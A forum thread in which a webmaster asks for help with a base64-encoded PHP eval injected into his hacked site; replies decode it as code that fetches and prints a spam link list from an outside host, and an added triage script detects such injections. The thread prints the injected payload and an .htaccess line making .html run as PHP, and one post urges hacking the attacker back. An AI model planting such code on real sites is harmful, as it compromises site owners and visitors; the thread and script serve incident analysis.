Help someone hacked my site : Please help me decipher code : !!!!!!!!!!!!!!!!!!!!!!!!

  • NetHorse
    Confirmed User
    • Dec 2006
    • 3526

    #1

    Help someone hacked my site : Please help me decipher code : !!!!!!!!!!!!!!!!!!!!!!!!

    <!--erda8--><?php eval(base64_decode("JGw9Imh0dHA6Ly9kbWkuZXJkYXVkdG VhbS5iaXovbGluay9saW5rLnBocCI7IGlmIChleHRlbnNpb25f bG9hZGVkKCJjdXJsIikpey ANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gs IENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2 gsIENVUkxPUFRfUkVUVVJO VFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE 9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3Vy bF9jbG9zZSgkY2gpO30NCm Vsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBA JHI7DQo=")); ?>

    Someone gained access to one of my sites that promotes a nats program and added that little script. Any idea what that means or what it was possibly doing? Thanks to anyone out there who can help.
    ┌∩┐(◣_◢)┌∩┐
    ICQ # 427013273
  • DarkJedi
    No Refunds Issued.
    • Feb 2001
    • 28301

    #2
    It means you need to move to a new host that doesn't have a head up their ass.


    • NetHorse
      Confirmed User
      • Dec 2006
      • 3526

      #3
      Also found this in all my .htaccess files


      AddHandler application/x-httpd-php .html .htm .shtm

      and huge spam list linking to this site

      http://www.evolutionisdead.com/

      ????????

      • darksoul
        Confirmed User
        • Apr 2002
        • 4997

        #4
        Code:
        $l = "http://dmi.erdaudteam.biz/link/link.php";
        if (extension_loaded("curl")) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_TIMEOUT, 30);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $l);
            $r = curl_exec($ch);
            curl_close($ch);
        } else {
            $r = implode("", file($l));
        }
        print @$r;
        1337 5y54|)m1n: 157717888
        BM-2cUBw4B2fgiYAfjkE7JvWaJMiUXD96n9tN
        Cambooth
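
Added example, not part of the original thread: a triage script that decodes `eval(base64_decode(...))` injections as text without executing them, lists the URLs they fetch, and flags `.htaccess` lines that route non-PHP extensions through the PHP handler. The function names, the `collector.example` host and the sample payload are constructed for illustration; the `AddHandler` line is the one quoted in post #3.

```python
import base64
import binascii
import re

# eval(base64_decode("...")) with whitespace tolerated inside the blob
EVAL_B64 = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*(["\'])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)', re.I)
URL = re.compile(r'https?://[^\s"\'<>;)]+')
# .htaccess line that routes extra extensions through the PHP handler
PHP_HANDLER = re.compile(
    r'^[ \t]*(?:AddHandler|AddType)[ \t]+application/x-httpd-php\S*[ \t]+(.+)$',
    re.I | re.M)


def decode_injections(text):
    """Decode every eval(base64_decode()) payload as text; nothing is executed."""
    found = []
    for m in EVAL_B64.finditer(text):
        blob = re.sub(r'\s+', '', m.group(2))  # undo line-wrap spaces
        try:
            src = base64.b64decode(blob, validate=True).decode('utf-8', 'replace')
        except (binascii.Error, ValueError):
            continue  # not valid base64: leave for manual review
        found.append({'source': src, 'urls': URL.findall(src)})
    return found


def php_handler_extensions(htaccess):
    """Extensions other than .php* that a handler line makes executable as PHP."""
    exts = []
    for m in PHP_HANDLER.finditer(htaccess):
        exts += [e for e in m.group(1).split() if not e.lower().startswith('.php')]
    return exts


# Constructed sample data (harmless payload, placeholder host), built at run time
PAYLOAD = '$l="http://collector.example/link/link.php"; print @implode("",file($l));'
_b64 = base64.b64encode(PAYLOAD.encode()).decode()
_wrapped = ' '.join(_b64[i:i + 22] for i in range(0, len(_b64), 22))
SAMPLE_PAGE = '<!--marker--><?php eval(base64_decode("%s")); ?>\n<html></html>\n' % _wrapped
SAMPLE_HTACCESS = ('Options -Indexes\n'
                   'AddHandler application/x-httpd-php .html .htm .shtm\n')

if __name__ == '__main__':
    for hit in decode_injections(SAMPLE_PAGE):
        print(hit['source'], hit['urls'])
    print(php_handler_extensions(SAMPLE_HTACCESS))
```

Run over a copy of the docroot, the two functions give a list of injected pages with their fetch targets and a list of `.htaccess` files to restore, which is the cleanup scope for the compromise described in posts #1 and #3.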


        • beta-tester
          Rock 'n Roll Baby!
          • Sep 2004
          • 22562

          #5
          it means that it'll execute this statement:

          $l="http://dmi.erdaudteam.biz/link/link.php"; if (extension_loaded("curl")){
          $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
          curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);}
          else{$r=implode("",file($l));} print @$r;


          if it helps

          Sig for sale. Affordable prices. Contact me and get a great deal ;)

          My contact:
          ICQ: 944-320-46
          e-mail: manca {AT} HotFreeSex4All.com


          • darksoul
            Confirmed User
            • Apr 2002
            • 4997

            #6
            basically it loads the list with spammed URLs from dmi.erdaudteam.biz/link/link.php

            • NetHorse
              Confirmed User
              • Dec 2006
              • 3526

              #7
              Thanks a lot guys I'll try to get a hold of this guy's host and have him shut down

              • NetHorse
                Confirmed User
                • Dec 2006
                • 3526

                #8
                estdomains.com is the domain the site is hosted on!

                • NetHorse
                  Confirmed User
                  • Dec 2006
                  • 3526

                  #9
                  If they don't do anything about it can I contact ICANN? I want this asshole's site SHUT DOWN!!!!!!!!!!!!

                  • tahiti
                    Confirmed User
                    • Oct 2003
                    • 699

                    #10
                    so easy, it was some base64 encoding.

                    --->aWYgeW91IG5lZWQgaGVscCBjaGVjayBteSBzaWcuLi4gSSBnd WVzcyB5b3UgY2FuJ3QgcmVhZCB0aGF0IDstKQ==
                    -------------------------------
                    Oliver Smith
                    "Drunk Russian Hackers are Invincible"
                    ASCII P0rn rules
                    aim: olvrsmt
                    icq: 21018030


                    • NetHorse
                      Confirmed User
                      • Dec 2006
                      • 3526

                      #11
                      blah someone hack his site. POS really fucked one of my rankings with one site.

                      • Juicy D. Links
                        So Fucking Banned
                        • Apr 2001
                        • 122992

                        #12
                        that's some nice code


                        • NetHorse
                          Confirmed User
                          • Dec 2006
                          • 3526

                          #13
                          Originally posted by Juicy D. Links
                          that's some nice code
                          ? Meaning these are talented hackers?